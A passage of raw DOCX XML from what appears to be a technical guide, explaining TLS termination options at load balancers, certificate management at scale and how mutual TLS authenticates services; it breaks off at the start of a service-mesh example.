        <w:t>Client ←HTTPS→ [LB] ←HTTPS (new session)→ [App Server]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150663F6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Option A (most common):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3135A1C5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="900"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Advantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718BCE64" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="900"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>App servers don't handle crypto (simpler, less CPU).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B79CBA4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="900"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Certificate management centralized (one place to update certs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A86090D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="900"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>LB can inspect HTTP content (L7 routing, caching, WAF).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73161395" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="900"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Connection pooling/multiplexing between LB and backends.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FA2F7E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="900"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Disadvantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FCD210" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="900"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Traffic between LB and app server is unencrypted. Acceptable in trusted networks (same VPC, encrypted overlay). Not acceptable for compliance requiring end-to-end encryption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661368C2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="900"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>If the internal network is compromised, traffic is readable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A6B61E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Option B (TLS passthrough):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A555FE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="901"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Advantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E0DAD9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="901"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>End-to-end encryption (LB never sees plaintext).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25388E0D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="901"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>App server has full control over TLS (cipher selection, client certs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05AE4CB0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="901"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Required when the app needs mTLS with clients.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC0A5C0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="901"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Disadvantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA377DD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="901"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>LB can't do L7 routing (can't read HTTP, only sees encrypted bytes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693A2D34" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="901"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Each app server manages its own certificates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E50E83" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="901"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Can only load balance at L4 (TCP level — no content-based routing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296AA3A3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Option C (re-encryption):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B147B5A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="902"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Advantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCD356A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="902"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>LB can inspect/route HTTP (L7 capable).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A86F7F3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="902"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Traffic between LB and backend is still encrypted (defense in depth).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E31A50" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="902"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Meets compliance requirements for encryption everywhere.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617564A0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="902"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Disadvantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA227BD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="902"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Double crypto cost (terminate + re-establish).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADB60CA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="902"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Certificate management in two places.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1D0B37" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="902"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Added complexity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E43EAB0" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.2 Certificate Management at Scale</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8F3421" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The operational challenge:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CFE028" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>100 microservices × 3 environments × multiple domains = hundreds of certificates to manage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD73645" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Problems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E49E9CD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="903"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Certificates expire. An expired cert = instant outage (browsers reject the connection).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749B5DAC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="903"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Private keys must be stored securely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07658799" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="903"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Certificate rotation must be seamless (no downtime).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0FB2A6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="903"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Different services may need different certificates.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4581BE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solutions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8F1E08" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Automated certificate management:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7FE1BD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="904"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Cert-manager (Kubernetes): Automatically requests/renews Let's Encrypt certificates. Stores as Kubernetes secrets. Mounts into pods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2103D86B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="904"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Vault PKI: HashiCorp Vault acts as a private CA. Issues short-lived certificates (hours) to services. Automatic renewal via sidecar/init container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9242A9" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Short-lived certificates (the modern approach):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2514134E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="905"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Instead of 1-year certificates manually installed: use certificates valid for 24 hours, automatically issued and rotated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E355CDF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="905"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>If a key is compromised, the window of exposure is 24 hours (not months).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3038A011" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="905"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>No need for revocation infrastructure (certificate expires before anyone could exploit it).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076189D7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="905"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Used by service meshes: Istio issues 24-hour certificates to every pod via its CA (Citadel).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F1B288" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.3 Mutual TLS (mTLS) — Service-to-Service Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5AD271" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Regular TLS:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> Only the SERVER proves its identity. The client is anonymous (at TLS level).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7947F404" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mutual TLS:</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> BOTH parties present certificates and verify each other.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58693BC8" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How mTLS works in the handshake:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58274B16" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="906"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Standard handshake begins (server presents its certificate).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76786640" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="906"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Server sends CertificateRequest message (asks client for a certificate).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F7AE99" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="906"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Client sends its own certificate + proof of key ownership.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF1D51C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="906"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Server verifies client's certificate against its trust store.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B896F7D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="906"/>
        </w:numPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Now both parties are authenticated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3286B97F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use in microservices (service mesh):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7587019E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57560B59" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Service A (cert: "service-a.example.internal")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFE4667" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
      </w:pPr>
